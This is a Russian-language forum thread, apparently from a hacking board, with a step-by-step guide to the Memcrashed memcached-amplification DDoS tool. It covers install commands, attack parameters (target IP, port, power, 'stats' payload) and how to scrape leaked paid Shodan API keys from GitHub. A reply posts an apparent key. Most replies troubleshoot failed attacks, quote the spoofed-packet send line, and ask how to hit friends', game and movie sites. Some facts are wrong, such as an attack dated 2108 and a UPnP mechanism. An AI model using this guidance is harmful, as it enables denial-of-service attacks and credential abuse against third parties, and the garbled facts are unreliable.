В этой статье я познакомлю вас с утилитой Memcrashed.

https://forum.antichat.xyz/attachments/29038387/img_1fa8fa7f8d.png

Memcrashed - это инструмент, позволяющий использовать Shodan.io для получения сотен уязвимых Memcached серверов. Затем он позволяет использовать те же серверы для запуска широко распространенной атаки типа DDoS путем подделки пакетов UDP, полученных вашей жертвой. Полезная нагрузка по умолчанию включает в себя команду memcached "stats", 10 байтов для отправки, но ответ составляет от 1500 байт до сотен килобайт. Только представьте себе цифры. Очень грозное оружие. Чтобы ознакомится с последствиями уже произведенных атак, просто загуглите. Последствия и мощность просто поражают. 28 февраля 2108 г. на GitHub.com произошла атака мощностью 1,35 Тб/сек.

Данная статья предоставлена исключительно в целях ознакомления, применение на практике влечет за собой ответственность, предусмотренную законодательством вашей страны.

Если вы вдруг не совсем осведомлены:

DoS (Denial of Service «отказ в обслуживании») — хакерская атака на сервер с целью довести её до отказа, то есть создание таких условий, при которых пользователи системы не смогут получить доступ к предоставляемым системным ресурсам (серверам), либо этот доступ будет затруднён. В настоящее время DoS и DDoS атаки наиболее популярны, так как позволяют довести до отказа практически любую систему, не оставляя юридически значимых улик. И еще, простыми словами DoS - это атака с одного компьютера (зачастую не эффективна), DDoS - это атака выполняемая одновременно с большого числа компьютеров. Не путайте.

Немного теории(принцип работы инструмента):
Амплифицированная DDoS-атака - это тип DDoS-атак с отражением, эксплуатирующий набор сетевых протоколов Universal Plug and Play (UPnP) для отправки амплифицированного потока трафика серверу-жертве. Этот трафик переполняет инфраструктуру атакуемого сервера и приводит к его отказу. Простыми словами серверы memcached имеют возможность работать по протоколу UDP. UDP - это сетевой протокол, который позволяет отправлять данные без предварительного получения так называемого "рукопожатия", представляющего собой сетевой процесс, в котором обе стороны соглашаются установить связь. Протокол UDP используется потому, что для отправки данных целевому серверу, не нужно его предварительное согласие на прием данных, что позволяет отправлять огромное количество данных без подтверждения со стороны целевого сервера.

https://forum.antichat.xyz/attachments/29038387/1.png

Практика
Переходим к установке инструмента. Я буду использовать распространенную в сфере ИБ ОС Kali linux (x64 в моем случаи)
Данный инструмент пылиться в недрах гитхаба. для его установке запускаем Кали, открывает терминал и вводим следующее:

Код:



apt-get update & apt-get upgrade


после обновления переходим к git clone:

Код:



git clone https://github.com/649/Memcrashed-DDoS-Exploit.git


https://forum.antichat.xyz/attachments/29038387/img_9f249e21c3.png

Далее нужно проверить наличие необходимых для работы инструментов. Ваш ответ будет выглядить немного подругому, так как я уже все устанавливал ранее. при повторном вводе команды, ответ получится как у меня.
сами команды:

Код:



apt-get install python3


https://forum.antichat.xyz/attachments/29038387/img_3afbb4c9d3.png

Код:



pip install scapy


https://forum.antichat.xyz/attachments/29038387/img_b3df12f56d.png

Код:



pip install shodan


https://forum.antichat.xyz/attachments/29038387/img_3352131ec7.png

переходим в директорию инструмента:

Код:



cd /Memcrashed-DDoS-Exploit


https://forum.antichat.xyz/attachments/29038387/img_594dd7a038.png

и последняя команда:

Код:



pip install -r requirements.txt


https://forum.antichat.xyz/attachments/29038387/img_0b9e2705ca.png

теперь инструмент готов к использованию:

Код:



python3 Memcrashed.py


https://forum.antichat.xyz/attachments/29038387/img_991829e339.png

Memcrashed просит ввести ему валидный api key shodan (кто не знает шодан - гуглите). api key можно попробовать поискать на github.com по по анологичной фразе: api key //// ApiKey //// ApiKey Shodan /////
примерно 10 минут поиска, и ключ shodan.io у меня в руках (полная платная версия. 3к если не ошибаюсь)

https://forum.antichat.xyz/attachments/29038387/img_8328a42b82.png

P/S 45651 сервер..... я не использовал этот инструмент, только ознакомился. Настоятельно не рекомендую использовать его в любых целях.

Инструмент позволяет хранить данные шодан (сервера memcashed) и использовать их без подключения к шодан.
Далее инструмент будет спрашивать есть ли у вас локальные боты (сохраненый поиск шодан) или же искать по api key на шодан. попросит IP (target - цель) и спросит по какому порту бить. тут нужен открытый порт у цели. попросит ввести мощность атаки ( Enter preferred power (Default 1): ) и какой payload использовать ( Enter payload contained inside packet) по умолчанию лучше использовать stats (10 байтов для отправки, ответ от 1500 байт до сотен килобайт).

Так же, как и говорилось выше, программа предложит записать сервера в файл bots.txt (для использования без shodan). " Would you like to display all the bots from Shodan? : " при вводе "y" начнется перечисление серверов на мониторе:

https://forum.antichat.xyz/attachments/29038387/img_0fa0265219.png

я остановил этот процесс, так как мне это не нужно. Мы же только ознакамливаемся

Помните, DDoS это уголовно наказуемая деятельность.

Искал, искал, но так и не удалось найти api key shodan (про бесплатный для всех знаю)(нужен платный но без денег)

technik_ekb сказал(а):

Искал, искал, но так и не удалось найти api key shodan (про бесплатный для всех знаю)(нужен платный но без денег)


Плохо искал, я за 10 минут валидный ключ нашел на гитхабе по кодам

Ruby сказал(а):

я тоже такой юзаю)

Подскажите пожалуйста, вот есть у меня получается несколько рабочих валидатных ключей, я делаю все как на инструкции и ни какого ддос нету - максимум это пакеты размером 56кб (проверка через wireshark) даже собственный инет не посадило. Помогите, что делать?

s unity сказал(а):

В этой статье я познакомлю вас с утилитой Memcrashed.

Memcrashed - это инструмент, позволяющий использовать Shodan.io для получения сотен уязвимых Memcached серверов. Затем он позволяет использовать те же серверы для запуска широко распространенной атаки типа DDoS путем подделки пакетов UDP, полученных вашей жертвой. Полезная нагрузка по умолчанию включает в себя команду memcached "stats", 10 байтов для отправки, но ответ составляет от 1500 байт до сотен килобайт. Только представьте себе цифры. Очень грозное оружие. Чтобы ознакомится с последствиями уже произведенных атак, просто загуглите. Последствия и мощность просто поражают. 28 февраля 2108 г. на GitHub.com произошла атака мощностью 1,35 Тб/сек.

Данная статья предоставлена исключительно в целях ознакомления, применение на практике влечет за собой ответственность, предусмотренную законодательством вашей страны.

Если вы вдруг не совсем осведомлены:

DoS (Denial of Service «отказ в обслуживании») — хакерская атака на сервер с целью довести её до отказа, то есть создание таких условий, при которых пользователи системы не смогут получить доступ к предоставляемым системным ресурсам (серверам), либо этот доступ будет затруднён. В настоящее время DoS и DDoS атаки наиболее популярны, так как позволяют довести до отказа практически любую систему, не оставляя юридически значимых улик. И еще, простыми словами DoS - это атака с одного компьютера (зачастую не эффективна), DDoS - это атака выполняемая одновременно с большого числа компьютеров. Не путайте.

Немного теории(принцип работы инструмента):
Амплифицированная DDoS-атака - это тип DDoS-атак с отражением, эксплуатирующий набор сетевых протоколов Universal Plug and Play (UPnP) для отправки амплифицированного потока трафика серверу-жертве. Этот трафик переполняет инфраструктуру атакуемого сервера и приводит к его отказу. Простыми словами серверы memcached имеют возможность работать по протоколу UDP. UDP - это сетевой протокол, который позволяет отправлять данные без предварительного получения так называемого "рукопожатия", представляющего собой сетевой процесс, в котором обе стороны соглашаются установить связь. Протокол UDP используется потому, что для отправки данных целевому серверу, не нужно его предварительное согласие на прием данных, что позволяет отправлять огромное количество данных без подтверждения со стороны целевого сервера.

Практика
Переходим к установке инструмента. Я буду использовать распространенную в сфере ИБ ОС Kali linux (x64 в моем случаи)
Данный инструмент пылиться в недрах гитхаба. для его установке запускаем Кали, открывает терминал и вводим следующее:

Код:



apt-get update & apt-get upgrade


после обновления переходим к git clone:

Код:



git clone https://github.com/649/Memcrashed-DDoS-Exploit.git


Далее нужно проверить наличие необходимых для работы инструментов. Ваш ответ будет выглядить немного подругому, так как я уже все устанавливал ранее. при повторном вводе команды, ответ получится как у меня.
сами команды:

Код:



apt-get install python3


Код:



pip install scapy


Код:



pip install shodan


переходим в директорию инструмента:

Код:



cd /Memcrashed-DDoS-Exploit


и последняя команда:

Код:



pip install -r requirements.txt


теперь инструмент готов к использованию:

Код:



python3 Memcrashed.py


Memcrashed просит ввести ему валидный api key shodan (кто не знает шодан - гуглите). api key можно попробовать поискать на github.com по по анологичной фразе: api key //// ApiKey //// ApiKey Shodan /////
примерно 10 минут поиска, и ключ shodan.io у меня в руках (полная платная версия. 3к если не ошибаюсь)

P/S 45651 сервер..... я не использовал этот инструмент, только ознакомился. Настоятельно не рекомендую использовать его в любых целях.

Инструмент позволяет хранить данные шодан (сервера memcashed) и использовать их без подключения к шодан.
Далее инструмент будет спрашивать есть ли у вас локальные боты (сохраненый поиск шодан) или же искать по api key на шодан. попросит IP (target - цель) и спросит по какому порту бить. тут нужен открытый порт у цели. попросит ввести мощность атаки ( Enter preferred power (Default 1): ) и какой payload использовать ( Enter payload contained inside packet) по умолчанию лучше использовать stats (10 байтов для отправки, ответ от 1500 байт до сотен килобайт).

Так же, как и говорилось выше, программа предложит записать сервера в файл bots.txt (для использования без shodan). " Would you like to display all the bots from Shodan? : " при вводе "y" начнется перечисление серверов на мониторе:

я остановил этот процесс, так как мне это не нужно. Мы же только ознакамливаемся

Помните, DDoS это уголовно наказуемая деятельность.


сделал все как здесь пишет нифига не дидосит запросы идут понту ноль

toretto сказал(а):

сделал все как здесь пишет нифига не дидосит запросы идут понту ноль


боты, которым ты сказал фас, работают на UDP портах, смотри чтоб у жертвы были они открыты. это одна из самых очевидных проблем, но их может быть много. нужно думать чуть-чуть, особенно в этой области

s unity сказал(а):

В этой статье я познакомлю вас с утилитой Memcrashed.

Memcrashed - это инструмент, позволяющий использовать Shodan.io для получения сотен уязвимых Memcached серверов. Затем он позволяет использовать те же серверы для запуска широко распространенной атаки типа DDoS путем подделки пакетов UDP, полученных вашей жертвой. Полезная нагрузка по умолчанию включает в себя команду memcached "stats", 10 байтов для отправки, но ответ составляет от 1500 байт до сотен килобайт. Только представьте себе цифры. Очень грозное оружие. Чтобы ознакомится с последствиями уже произведенных атак, просто загуглите. Последствия и мощность просто поражают. 28 февраля 2108 г. на GitHub.com произошла атака мощностью 1,35 Тб/сек.

Данная статья предоставлена исключительно в целях ознакомления, применение на практике влечет за собой ответственность, предусмотренную законодательством вашей страны.

Если вы вдруг не совсем осведомлены:

DoS (Denial of Service «отказ в обслуживании») — хакерская атака на сервер с целью довести её до отказа, то есть создание таких условий, при которых пользователи системы не смогут получить доступ к предоставляемым системным ресурсам (серверам), либо этот доступ будет затруднён. В настоящее время DoS и DDoS атаки наиболее популярны, так как позволяют довести до отказа практически любую систему, не оставляя юридически значимых улик. И еще, простыми словами DoS - это атака с одного компьютера (зачастую не эффективна), DDoS - это атака выполняемая одновременно с большого числа компьютеров. Не путайте.

Немного теории(принцип работы инструмента):
Амплифицированная DDoS-атака - это тип DDoS-атак с отражением, эксплуатирующий набор сетевых протоколов Universal Plug and Play (UPnP) для отправки амплифицированного потока трафика серверу-жертве. Этот трафик переполняет инфраструктуру атакуемого сервера и приводит к его отказу. Простыми словами серверы memcached имеют возможность работать по протоколу UDP. UDP - это сетевой протокол, который позволяет отправлять данные без предварительного получения так называемого "рукопожатия", представляющего собой сетевой процесс, в котором обе стороны соглашаются установить связь. Протокол UDP используется потому, что для отправки данных целевому серверу, не нужно его предварительное согласие на прием данных, что позволяет отправлять огромное количество данных без подтверждения со стороны целевого сервера.

Практика
Переходим к установке инструмента. Я буду использовать распространенную в сфере ИБ ОС Kali linux (x64 в моем случаи)
Данный инструмент пылиться в недрах гитхаба. для его установке запускаем Кали, открывает терминал и вводим следующее:

Код:



apt-get update & apt-get upgrade


после обновления переходим к git clone:

Код:



git clone https://github.com/649/Memcrashed-DDoS-Exploit.git


Далее нужно проверить наличие необходимых для работы инструментов. Ваш ответ будет выглядить немного подругому, так как я уже все устанавливал ранее. при повторном вводе команды, ответ получится как у меня.
сами команды:

Код:



apt-get install python3


Код:



pip install scapy


Код:



pip install shodan


переходим в директорию инструмента:

Код:



cd /Memcrashed-DDoS-Exploit


и последняя команда:

Код:



pip install -r requirements.txt


теперь инструмент готов к использованию:

Код:



python3 Memcrashed.py


Memcrashed просит ввести ему валидный api key shodan (кто не знает шодан - гуглите). api key можно попробовать поискать на github.com по по анологичной фразе: api key //// ApiKey //// ApiKey Shodan /////
примерно 10 минут поиска, и ключ shodan.io у меня в руках (полная платная версия. 3к если не ошибаюсь)

P/S 45651 сервер..... я не использовал этот инструмент, только ознакомился. Настоятельно не рекомендую использовать его в любых целях.

Инструмент позволяет хранить данные шодан (сервера memcashed) и использовать их без подключения к шодан.
Далее инструмент будет спрашивать есть ли у вас локальные боты (сохраненый поиск шодан) или же искать по api key на шодан. попросит IP (target - цель) и спросит по какому порту бить. тут нужен открытый порт у цели. попросит ввести мощность атаки ( Enter preferred power (Default 1): ) и какой payload использовать ( Enter payload contained inside packet) по умолчанию лучше использовать stats (10 байтов для отправки, ответ от 1500 байт до сотен килобайт).

Так же, как и говорилось выше, программа предложит записать сервера в файл bots.txt (для использования без shodan). " Would you like to display all the bots from Shodan? : " при вводе "y" начнется перечисление серверов на мониторе:

я остановил этот процесс, так как мне это не нужно. Мы же только ознакамливаемся

Помните, DDoS это уголовно наказуемая деятельность.


pip install scapy , shogan не устанавливаеться

pip install scapy ,pip install shodan ,pip install -r requirements.txt не устанавливаеться

toretto сказал(а):

pip install scapy , shogan не устанавливаеться

pip install scapy ,pip install shodan ,pip install -r requirements.txt не устанавливаеться


pip3 install...

Wivery11211 сказал(а):

pip3 install...


ApiKey Shodan cлетает постоянно а так программу уже установил,только надо как то проверить дидосит она или нет

Как начать дос атаку? (У меня memcrashed на виндовс) Через эту программу можно заделать дос атаку?

Как отправить ботов?

виндовс это туфта, ставь кали линукс как вторая система!и работай там много хакерского софта

toretto сказал(а):

виндовс это туфта, ставь кали линукс как вторая система!и работай там много хакерского софта



У меня не получается установить кали линукс. Можешь помочь? Буду очень благодарен!

Артём Кравцов сказал(а):

У меня не получается установить кали линукс. Можешь помочь? Буду очень благодарен!


помогу только завтра напиши какой у тебя комп проц. И оперативки сколько.

toretto сказал(а):

помогу только завтра напиши какой у тебя комп проц. И оперативки сколько.



Хорошо) Windows 7 (Максимальная),3 или 4 оперативки,4, ядра. Процессор уточню.

pip


s unity сказал(а):

В этой статье я познакомлю вас с утилитой Memcrashed.

Memcrashed - это инструмент, позволяющий использовать Shodan.io для получения сотен уязвимых Memcached серверов. Затем он позволяет использовать те же серверы для запуска широко распространенной атаки типа DDoS путем подделки пакетов UDP, полученных вашей жертвой. Полезная нагрузка по умолчанию включает в себя команду memcached "stats", 10 байтов для отправки, но ответ составляет от 1500 байт до сотен килобайт. Только представьте себе цифры. Очень грозное оружие. Чтобы ознакомится с последствиями уже произведенных атак, просто загуглите. Последствия и мощность просто поражают. 28 февраля 2108 г. на GitHub.com произошла атака мощностью 1,35 Тб/сек.

Данная статья предоставлена исключительно в целях ознакомления, применение на практике влечет за собой ответственность, предусмотренную законодательством вашей страны.

Если вы вдруг не совсем осведомлены:

DoS (Denial of Service «отказ в обслуживании») — хакерская атака на сервер с целью довести её до отказа, то есть создание таких условий, при которых пользователи системы не смогут получить доступ к предоставляемым системным ресурсам (серверам), либо этот доступ будет затруднён. В настоящее время DoS и DDoS атаки наиболее популярны, так как позволяют довести до отказа практически любую систему, не оставляя юридически значимых улик. И еще, простыми словами DoS - это атака с одного компьютера (зачастую не эффективна), DDoS - это атака выполняемая одновременно с большого числа компьютеров. Не путайте.

Немного теории(принцип работы инструмента):
Амплифицированная DDoS-атака - это тип DDoS-атак с отражением, эксплуатирующий набор сетевых протоколов Universal Plug and Play (UPnP) для отправки амплифицированного потока трафика серверу-жертве. Этот трафик переполняет инфраструктуру атакуемого сервера и приводит к его отказу. Простыми словами серверы memcached имеют возможность работать по протоколу UDP. UDP - это сетевой протокол, который позволяет отправлять данные без предварительного получения так называемого "рукопожатия", представляющего собой сетевой процесс, в котором обе стороны соглашаются установить связь. Протокол UDP используется потому, что для отправки данных целевому серверу, не нужно его предварительное согласие на прием данных, что позволяет отправлять огромное количество данных без подтверждения со стороны целевого сервера.

Практика
Переходим к установке инструмента. Я буду использовать распространенную в сфере ИБ ОС Kali linux (x64 в моем случаи)
Данный инструмент пылиться в недрах гитхаба. для его установке запускаем Кали, открывает терминал и вводим следующее:

Код:



apt-get update & apt-get upgrade


после обновления переходим к git clone:

Код:



git clone https://github.com/649/Memcrashed-DDoS-Exploit.git


Далее нужно проверить наличие необходимых для работы инструментов. Ваш ответ будет выглядить немного подругому, так как я уже все устанавливал ранее. при повторном вводе команды, ответ получится как у меня.
сами команды:

Код:



apt-get install python3


Код:



pip install scapy


Код:



pip install shodan


переходим в директорию инструмента:

Код:



cd /Memcrashed-DDoS-Exploit


и последняя команда:

Код:



pip install -r requirements.txt


теперь инструмент готов к использованию:

Код:



python3 Memcrashed.py


Memcrashed просит ввести ему валидный api key shodan (кто не знает шодан - гуглите). api key можно попробовать поискать на github.com по по анологичной фразе: api key //// ApiKey //// ApiKey Shodan /////
примерно 10 минут поиска, и ключ shodan.io у меня в руках (полная платная версия. 3к если не ошибаюсь)

P/S 45651 сервер..... я не использовал этот инструмент, только ознакомился. Настоятельно не рекомендую использовать его в любых целях.

Инструмент позволяет хранить данные шодан (сервера memcashed) и использовать их без подключения к шодан.
Далее инструмент будет спрашивать есть ли у вас локальные боты (сохраненый поиск шодан) или же искать по api key на шодан. попросит IP (target - цель) и спросит по какому порту бить. тут нужен открытый порт у цели. попросит ввести мощность атаки ( Enter preferred power (Default 1): ) и какой payload использовать ( Enter payload contained inside packet) по умолчанию лучше использовать stats (10 байтов для отправки, ответ от 1500 байт до сотен килобайт).

Так же, как и говорилось выше, программа предложит записать сервера в файл bots.txt (для использования без shodan). " Would you like to display all the bots from Shodan? : " при вводе "y" начнется перечисление серверов на мониторе:

я остановил этот процесс, так как мне это не нужно. Мы же только ознакамливаемся

Помните, DDoS это уголовно наказуемая деятельность.


pip команду найти не могу

А С Этим скрип можно делать что то с комп хотя бы повредить виндовс у другого?

Артём Кравцов сказал(а):

Хорошо) Windows 7 (Максимальная),3 или 4 оперативки,4, ядра. Процессор уточню.




смотри здесь , что не ясно пиши в личку.

toretto сказал(а):

смотри здесь , что не ясно пиши в личку.



Туда игры можно будет скачать? А гугл хром там есть?

Артём Кравцов сказал(а):

Туда игры можно будет скачать? А гугл хром там есть?


это для взлома система , установи ее вместе с виндовс как вторую систему

toretto сказал(а):

это для взлома система , установи ее вместе с виндовс как вторую систему



Как установить её как вторую систему? Я просто не разбераюсь в этом

Артём Кравцов сказал(а):

Как установить её как вторую систему? Я просто не разбераюсь в этом



Сделай загрузочную флешку, хотя бы в лайве запустись и глянь. Гайдов полно как это сделать

@Артём Кравцов (https://forum.antichat.xyz/members/2682321/) мне кажется это не твоё. Если уж гугл слишком сложен для вас, то это точно сложнее.

По теме:
Статья отличная, жаль что только UDP.

s unity сказал(а):

В этой статье я познакомлю вас с утилитой Memcrashed.

Memcrashed - это инструмент, позволяющий использовать Shodan.io для получения сотен уязвимых Memcached серверов. Затем он позволяет использовать те же серверы для запуска широко распространенной атаки типа DDoS путем подделки пакетов UDP, полученных вашей жертвой. Полезная нагрузка по умолчанию включает в себя команду memcached "stats", 10 байтов для отправки, но ответ составляет от 1500 байт до сотен килобайт. Только представьте себе цифры. Очень грозное оружие. Чтобы ознакомится с последствиями уже произведенных атак, просто загуглите. Последствия и мощность просто поражают. 28 февраля 2108 г. на GitHub.com произошла атака мощностью 1,35 Тб/сек.

Данная статья предоставлена исключительно в целях ознакомления, применение на практике влечет за собой ответственность, предусмотренную законодательством вашей страны.

Если вы вдруг не совсем осведомлены:

DoS (Denial of Service «отказ в обслуживании») — хакерская атака на сервер с целью довести её до отказа, то есть создание таких условий, при которых пользователи системы не смогут получить доступ к предоставляемым системным ресурсам (серверам), либо этот доступ будет затруднён. В настоящее время DoS и DDoS атаки наиболее популярны, так как позволяют довести до отказа практически любую систему, не оставляя юридически значимых улик. И еще, простыми словами DoS - это атака с одного компьютера (зачастую не эффективна), DDoS - это атака выполняемая одновременно с большого числа компьютеров. Не путайте.

Немного теории(принцип работы инструмента):
Амплифицированная DDoS-атака - это тип DDoS-атак с отражением, эксплуатирующий набор сетевых протоколов Universal Plug and Play (UPnP) для отправки амплифицированного потока трафика серверу-жертве. Этот трафик переполняет инфраструктуру атакуемого сервера и приводит к его отказу. Простыми словами серверы memcached имеют возможность работать по протоколу UDP. UDP - это сетевой протокол, который позволяет отправлять данные без предварительного получения так называемого "рукопожатия", представляющего собой сетевой процесс, в котором обе стороны соглашаются установить связь. Протокол UDP используется потому, что для отправки данных целевому серверу, не нужно его предварительное согласие на прием данных, что позволяет отправлять огромное количество данных без подтверждения со стороны целевого сервера.

Практика
Переходим к установке инструмента. Я буду использовать распространенную в сфере ИБ ОС Kali linux (x64 в моем случаи)
Данный инструмент пылиться в недрах гитхаба. для его установке запускаем Кали, открывает терминал и вводим следующее:

Код:



apt-get update & apt-get upgrade


после обновления переходим к git clone:

Код:



git clone https://github.com/649/Memcrashed-DDoS-Exploit.git


Далее нужно проверить наличие необходимых для работы инструментов. Ваш ответ будет выглядить немного подругому, так как я уже все устанавливал ранее. при повторном вводе команды, ответ получится как у меня.
сами команды:

Код:



apt-get install python3


Код:



pip install scapy


Код:



pip install shodan


переходим в директорию инструмента:

Код:



cd /Memcrashed-DDoS-Exploit


и последняя команда:

Код:



pip install -r requirements.txt


теперь инструмент готов к использованию:

Код:



python3 Memcrashed.py


Memcrashed просит ввести ему валидный api key shodan (кто не знает шодан - гуглите). api key можно попробовать поискать на github.com по по анологичной фразе: api key //// ApiKey //// ApiKey Shodan /////
примерно 10 минут поиска, и ключ shodan.io у меня в руках (полная платная версия. 3к если не ошибаюсь)

P/S 45651 сервер..... я не использовал этот инструмент, только ознакомился. Настоятельно не рекомендую использовать его в любых целях.

Инструмент позволяет хранить данные шодан (сервера memcashed) и использовать их без подключения к шодан.
Далее инструмент будет спрашивать есть ли у вас локальные боты (сохраненый поиск шодан) или же искать по api key на шодан. попросит IP (target - цель) и спросит по какому порту бить. тут нужен открытый порт у цели. попросит ввести мощность атаки ( Enter preferred power (Default 1): ) и какой payload использовать ( Enter payload contained inside packet) по умолчанию лучше использовать stats (10 байтов для отправки, ответ от 1500 байт до сотен килобайт).

Так же, как и говорилось выше, программа предложит записать сервера в файл bots.txt (для использования без shodan). " Would you like to display all the bots from Shodan? : " при вводе "y" начнется перечисление серверов на мониторе:

я остановил этот процесс, так как мне это не нужно. Мы же только ознакамливаемся

Помните, DDoS это уголовно наказуемая деятельность.


Memcrashed еще актуален? вобще то пробовал но сайт ни сном ни духом,может надо что-бы много компов было? может не так дидосил?

toretto сказал(а):

Memcrashed еще актуален? вобще то пробовал но сайт ни сном ни духом,может надо что-бы много компов было? может не так дидосил?


Протоколом ошиблись.
Сайт - HTTP - TCP/IP.
А мемкрашед - UDP

Pazsh сказал(а):

Протоколом ошиблись.
Сайт - HTTP - TCP/IP.
А мемкрашед - UDP


по ходу игровые и сайты с фильмами можно дидосить?

Revi47 сказал(а):

pip

pip команду найти не могу


pip3

Unnamed сказал(а):

pip3


apt-get pip3 install

toretto сказал(а):

apt-get pip3 install


Хоть бы информацию проверяли прежде чем писать.

Во-первых, пакета pip3 не существует. Есть python3-pip.
Во-вторых, вы нарушили синтаксис команды apt-get.
apt-get install python3-pip.

После apt-get всегдаидет операция!

Pazsh сказал(а):

Хоть бы информацию проверяли прежде чем писать.

Во-первых, пакета pip3 не существует. Есть python3-pip.
Во-вторых, вы нарушили синтаксис команды apt-get.
apt-get install python3-pip.

После apt-get всегдаидет операция!


да согласен ошибся

Revi47 сказал(а):

pip

pip команду найти не могу


pip3

Что делать если крашится memcrashed? На финале где нужно подтвердить атаку, он просто закрывается

technik_ekb сказал(а):

Искал, искал, но так и не удалось найти api key shodan (про бесплатный для всех знаю)(нужен платный но без денег)


PSKINdQe1GyxGgecYz2191H2JoS9qvgD

$ sudo apt-get install shodan
Чтение списков пакетов… Готово
Построение дерева зависимостей
Чтение информации о состоянии… Готово
E: Невозможно найти пакет shodan

s unity сказал(а):

боты, которым ты сказал фас, работают на UDP портах, смотри чтоб у жертвы были они открыты. это одна из самых очевидных проблем, но их может быть много. нужно думать чуть-чуть, особенно в этой области


А как узнать какие порты открыты для Ddosa , например я дудосил себя , естественно в ознокомительных целях , с дефолтным портом и ничего это значит , что мой порт который я выбрал закрыт? Но тогда как я узнаю какой порт открыт например у моего друга , зная его IP?

А в чем заключается уголовная ответственность если пакеты отправляешь не ты а боты Shodan?
И как вычисляют виновника торжества?

Good thanks

Артём Кравцов сказал(а):

Туда игры можно будет скачать? А гугл хром там есть?


Если сильно постораться то будет)

dark_king_style сказал(а):

я дудосил себя , и ничего


утилитка работает только по UDP протоколу. этот протокол используется для быстрой передачи данных в отличии от tcp, и чаще всего встречается там где нужно передавать потоковое видео, голос, всякое такое.


dark_king_style сказал(а):

как я узнаю какой порт зная его IP?


если ты не знаешь как по ип просканировать порты, то рано ты замахнулся на эту программу. нужно сначала познакомится с другими, фундаментальными инструментами

Код:



Traceback (most recent call last):
File "Memcrashed.py", line 5, in
from scapy.all import *
File "/usr/local/lib/python3.8/dist-packages/scapy/all.py", line 18, in
from scapy.arch import *
File "/usr/local/lib/python3.8/dist-packages/scapy/arch/__init__.py", line 28, in
from scapy.arch.bpf.core import get_if_raw_addr
File "/usr/local/lib/python3.8/dist-packages/scapy/arch/bpf/core.py", line 11, in
from scapy.arch.common import get_if, compile_filter
File "/usr/local/lib/python3.8/dist-packages/scapy/arch/common.py", line 35, in
TCPDUMP = _check_tcpdump()
File "/usr/local/lib/python3.8/dist-packages/scapy/arch/common.py", line 30, in _check_tcpdump
proc = subprocess.Popen([conf.prog.tcpdump, "--version"],
File "/usr/lib/python3.8/subprocess.py", line 854, in __init__
self._execute_child(args, executable, preexec_fn, close_fds,
File "/usr/lib/python3.8/subprocess.py", line 1702, in _execute_child
raise child_exception_type(errno_num, err_msg, err_filename)
FileNotFoundError: [Errno 2] No such file or directory: 'tcpdump


что это значит?

в Termuxe не запускаеться

Jack Hudson сказал(а):

в Termuxe не запускаеться


Так это и не для термукса)

Metix сказал(а):

Так это и не для термукса)


я знаю просто попробовал

Я как-то смотрел про порты tcp/udp одинаковы?! Почему я этого понять не могу

А для термукса есть способ запуска?

Артём Кравцов сказал(а):

Туда игры можно будет скачать? А гугл хром там есть?


Kali будет у тебя как 2 ОС , твоя винда у тебя останится

Кто поможет с этим????

Код:



Sending 2 forged synchronized payloads to: xx.xxx.xxx.xxx
Traceback (most recent call last):
File "Memcrashed.py", line 122, in
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata), count=1)
File "/usr/local/lib/python3.8/dist-packages/scapy/sendrecv.py", line 312, in send
socket = conf.L3socket(*args, **kargs)
File "/usr/local/lib/python3.8/dist-packages/scapy/arch/linux.py", line 445, in __init__
self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501
File "/usr/lib/python3.8/socket.py", line 231, in __init__
_socket.socket.__init__(self, family, type, proto, fileno)
OSError: [Errno 97] Address family not supported by protocol
Exception ignored in:
Traceback (most recent call last):
File "/usr/local/lib/python3.8/dist-packages/scapy/supersocket.py", line 123, in __del__
self.close()
File "/usr/local/lib/python3.8/dist-packages/scapy/arch/linux.py", line 481, in close
set_promisc(self.ins, self.iface, 0)
AttributeError: 'L3PacketSocket' object has no attribute 'ins'

CHEATKEYS сказал(а):

Код:



Traceback (most recent call last):
File "Memcrashed.py", line 5, in
from scapy.all import *
File "/usr/local/lib/python3.8/dist-packages/scapy/all.py", line 18, in
from scapy.arch import *
File "/usr/local/lib/python3.8/dist-packages/scapy/arch/__init__.py", line 28, in
from scapy.arch.bpf.core import get_if_raw_addr
File "/usr/local/lib/python3.8/dist-packages/scapy/arch/bpf/core.py", line 11, in
from scapy.arch.common import get_if, compile_filter
File "/usr/local/lib/python3.8/dist-packages/scapy/arch/common.py", line 35, in
TCPDUMP = _check_tcpdump()
File "/usr/local/lib/python3.8/dist-packages/scapy/arch/common.py", line 30, in _check_tcpdump
proc = subprocess.Popen([conf.prog.tcpdump, "--version"],
File "/usr/lib/python3.8/subprocess.py", line 854, in __init__
self._execute_child(args, executable, preexec_fn, close_fds,
File "/usr/lib/python3.8/subprocess.py", line 1702, in _execute_child
raise child_exception_type(errno_num, err_msg, err_filename)
FileNotFoundError: [Errno 2] No such file or directory: 'tcpdump


что это значит?


sudo apt install tcpdump
и создать симлинк /usr/bin/tcpdump

Здравствуйте, помогите решить проблему с этой ошибкой, ключ вроде валидный ввожу, но выдает такую ошибку. Мне не хватает какой-то утилиты?





https://forum.antichat.xyz/attachments/29072447/img_4d30a1b53c.png

Земик Файзиев сказал(а):

А в чем заключается уголовная ответственность если пакеты отправляешь не ты а боты Shodan?
И как вычисляют виновника торжества?


273 статься ук РФ. Ознакомься для начала, а потом уже принимай решения, ддосить или нет)


dark_king_style сказал(а):

А как узнать какие порты открыты для Ddosa , например я дудосил себя , естественно в ознокомительных целях , с дефолтным портом и ничего это значит , что мой порт который я выбрал закрыт? Но тогда как я узнаю какой порт открыт например у моего друга , зная его IP?


nmap, кучу всего есть, чтобы узнать какие порты открыты у айпи адреса "жертвы"

Wivery11211 сказал(а):

pip3 install...


попробуй apt-get install scapy
apt-get install shodan
cd Memcrashed-DDoS-Exploit
pip3 install -r requirements.txt
у меня прошло

https://forum.antichat.xyz/attachments/29076866/img_74fb0ab0e1.png

Помогите пожалуйста что мне нужно сделать ???!! Заранее спасибо

StampyXxx сказал(а):

Помогите пожалуйста что мне нужно сделать ???!! Заранее спасибо


cd /usr/lib/x86_64-linux-gnu/
ln -s -f libc.a liblibc.a

StampyXxx сказал(а):

Помогите пожалуйста что мне нужно сделать ???!! Заранее спасибо


273 статься ук РФ. Ознакомься для начала.

StampyXxx сказал(а):

Помогите пожалуйста что мне нужно сделать ???!! Заранее спасибо


Привет, используй на свой страх и риск ddos. Чтобы всё заработало пиши сначала cd /usr/lib/x86_64-linux-gnu/, потом sudo ln -s -f libc.a liblibc.a и пробуй запускать

Артём Кравцов сказал(а):

Туда игры можно будет скачать? А гугл хром там есть?


